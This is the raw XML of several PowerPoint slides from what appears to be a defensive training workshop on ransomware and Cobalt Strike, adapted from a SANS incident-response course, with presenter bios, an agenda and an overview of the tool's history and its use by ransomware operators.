              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>I do stuff at PluralSight!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9820891C-21B4-0748-B5B5-F1A502383D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8314432" y="6018511"/>
            <a:ext cx="1738361" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arosenmund</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A68E75D4-1566-8746-800B-A216C80568F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4774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73A1B0-FB25-6843-ABF4-102C929C9AE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="432000"/>
            <a:ext cx="5472000" cy="432000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>About Ryan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A31BB0-9C4B-6F43-8397-2031E31A57B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="1008000"/>
            <a:ext cx="7057019" cy="360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Monkey tamer at your local zoo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C87562-37F8-D047-88EC-4FFEBC8B2014}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431999" y="1511565"/>
            <a:ext cx="5929043" cy="5088017"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Principal Incident Response Consultant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BlackBerry (acquired Cylance)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SANS Author</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FOR528: Ransomware for Incident Responders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CactusCon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Liaison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Former conference lead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pluralsight Author</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mouth Runner</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9820891C-21B4-0748-B5B5-F1A502383D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8314432" y="6018511"/>
            <a:ext cx="1215397" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@rj_chap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture Placeholder 6" descr="A person holding a book&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F323017-9874-6718-55E3-D02158B03D30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="7569" r="7569"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95462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dissolv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dissolv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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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
                                            <p:txEl>
                                              <p:pRg st="11" end="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="42"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FCE415-30B2-5E47-8ECB-BA9E7DCB7240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Are We Going to Cover?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{523C19A6-D351-C24F-933E-BE6CE492F1A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="10175514" cy="4775112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First things first – the lab environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 1 – Malware as a Service with Josh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploring initial delivery/infection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 2 – Malware and Adversary Behavior with Aaron</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understanding how attacker motivations/goals influence the requirements of malware/infrastructure required</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 3 - Cobalt Strike Deep-Dive with Ryan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Beacons and Malleable C2 Profiles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21179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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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xEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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xEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="31"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DA557-1757-2D3F-111F-1B6A7852F450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content from SANS FOR528 Course</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F03E4703-3B16-D553-D551-AC83B8F4C662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="9370608" cy="4759216"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This content has been adapted from my SANS course:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>FOR528: Ransomware for Incident Responders</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You get a free lab! – Lab 3.1 from Day 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Please refrain from sharing the actual lab content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>We’d appreciate it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Come on don’t share it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Thanks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Hey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>don’t share it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>plz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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lvl="6"/>
            <a:r>
              <a:rPr lang="en-US" sz="24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DAMMIT!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To learn more, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>for528.com/course</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2462513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A1A3-61A2-4BBD-95C0-BABA622BBFCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0582186-9E10-484B-842F-D1CCFDFB582E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="8047776" cy="4707685"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike is an adversary simulation &amp; Red Team operations toolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Began life in 2010 as “Armitage,” a GUI for Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Included in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BackTrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Kali Linux ever since</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Created by Raphael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mudge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sold to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HelpSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in 2020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also owns Core Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Licenses are regulated tightly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cracked/trial versions available on the darknet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Has become the tool of choice for ransomware operators</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFBEBE63-AA88-82E5-DE4B-FCE5721AFBFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4907BA46-6305-DDA7-B5EC-5C9921FAE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700" y="594075"/>
            <a:ext cx="2133600" cy="5524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ic cover">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC7B414-F99C-12F6-499B-43F7BE21C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736" y="2262366"/>
            <a:ext cx="2432240" cy="340232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B8F988-843B-7B3B-CB3E-D95DA9F53AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9120736" y="5547974"/>
            <a:ext cx="1939492" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>HelpSystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6292AE77-3A7F-D101-495A-F99BFCC62CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6376730" y="2767469"/>
            <a:ext cx="910286" cy="910286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="336517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A1A3-61A2-4BBD-95C0-BABA622BBFCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="151941"/>
            <a:ext cx="10175514" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TA Access to Cobalt Strike – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forum “4 Sale/Trade”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72C5212B-D551-A702-00F0-36E1C110622C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537950" y="6311900"/>
            <a:ext cx="654050" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219080">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{A12C446D-6113-E749-B2D6-33109B9D4DC9}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="1219080">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CEF6A14-42A4-908B-4F66-15232E783134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
